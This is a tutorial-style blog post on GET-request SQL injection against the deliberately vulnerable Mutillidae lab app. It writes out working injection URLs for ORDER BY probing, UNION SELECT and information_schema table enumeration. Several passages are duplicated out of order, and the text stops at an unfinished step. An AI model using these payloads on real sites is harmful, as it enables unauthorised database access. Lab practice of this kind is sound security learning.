SQL Injection - GET Request
Definitions*
Yup, I have include 5 parameters in the union sytax as I used order by and found out that there were 5 parameters being stored in the database
Wait, lets make it more interesting, we know that in every web server database hosting websites, there is a database called information schema which holds the details of all the tables currently present on the serve.
So, what we will do is upgrade the injection to look something like:
>> http://[IP]/mutillidae/index.php?page=user-info.php&username=Me union select 1,table_name,null,null,5 from information_schema.tables where table_schema = 'owasp10'%23&password=12345&user-info-php-submit-button=View+Account+Details
Thanks & Regards
What is Mutillidae?
Mutillidae II is a
free, open source, deliberately vulnerable web-application providing a target
for web-security enthusiast.
What is a SQL Injection?
- SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
- This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
- The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
_______________________ Main Content _____________________________
SQL injection for GET type requests :
In get type request
the password and ID that is requested on pages such as the login page is
visible on the address bar/http request, so we will try to inject our desired code through the get parameters
and exploit the vulnerability.
I will be using the
Mutillidae >> OWASP TOP 10 >> Injections >>SQL Extract Data
>> User Info as the page to experiment. [ Have hosted a Kali and a
Metaspolitable on a VM in a same virtual network ]
So you can see when
you reach the page, in the HTML address bar you will find something like:
>>[IP]/mutillidae/index.php?page=user-info.php
Enter a dummy id and
password, for example Name = Me & Password = 12345, this will give you:
Bonus tip: to easily
share and copy paste data across VM and host, just go to the VM setting
>> General >> Advanced and turn on shared clip-board to
bidirectional
So, it is quiet
evident that there must be some database that is being used by the webpage to
authorize the user login, and the data that is being feed through the get
request must be used as a input to such database to fetch data, we will use
this as a way to play around with the database and get access to critical data
such as logins and password.
Anytime you see
index.php? And parameter such as page=user.info.php and username= , you should
try to inject stuff in there.
First of all we will
play with injecting something to bypass the password authorization, then we
will be using the order by command in SQL to fund out the number of columns in
the SQL database in use.
Now to check if the
SQL injection works, tweek the HTML address as following:
>> http://[IP]/mutillidae/index.php?page=user-info.php&username=Me
order by 1 #&password=12345&user-info-php-submit-button=View+Account+Details
By putting the # we
commented the followed authorization, now press enter and see if the address
works.
Didn't work right ! Ha Ha Ha
So, here's the
trick, when you use hash symbols in a address bar these need to be encoded in
an HTTP acceptable format, I used https://www.urlencoder.org/
to encode # which turned out to be %23.
This will work:
>> http://[IP]/mutillidae/index.php?page=user-info.php&username=Me
order by 1 %23&password=12345&user-info-php-submit-button=View+Account+Details
Our Next Objective:
Now we need to know
the number of columns present in the database being utilised by the login php,
so just use hit and trial like order by 1000 or order by 5 and u will get error
until u put the right number of max columns in order by command.
Further we can find different parameters saved in the database by using methods such as unions as shown below:
>> http://[IP]/mutillidae/index.php?page=user-info.php&username=Me union select 1,database(),user(),version(),5 %23&password=12345&user-info-php-submit-button=View+Account+Details
Further we can find different parameters saved in the database by using methods such as unions as shown below:
>> http://[IP]/mutillidae/index.php?page=user-info.php&username=Me union select 1,database(),user(),version(),5 %23&password=12345&user-info-php-submit-button=View+Account+Details
Yup, I have include 5 parameters in the union sytax as I used order by and found out that there were 5 parameters being stored in the database
Wait, lets make it more interesting, we know that in every web server database hosting websites, there is a database called information schema which holds the details of all the tables currently present on the serve.
So, what we will do is upgrade the injection to look something like:
>> http://[IP]/mutillidae/index.php?page=user-info.php&username=Me union select 1,table_name,null,null,5 from information_schema.tables %23&password=12345&user-info-php-submit-button=View+Account+Details
This gets us back the result as all the tables info stored in the table within information schema
Lets make it more mutillidae specific:
Thanks & Regards
Comments
Post a Comment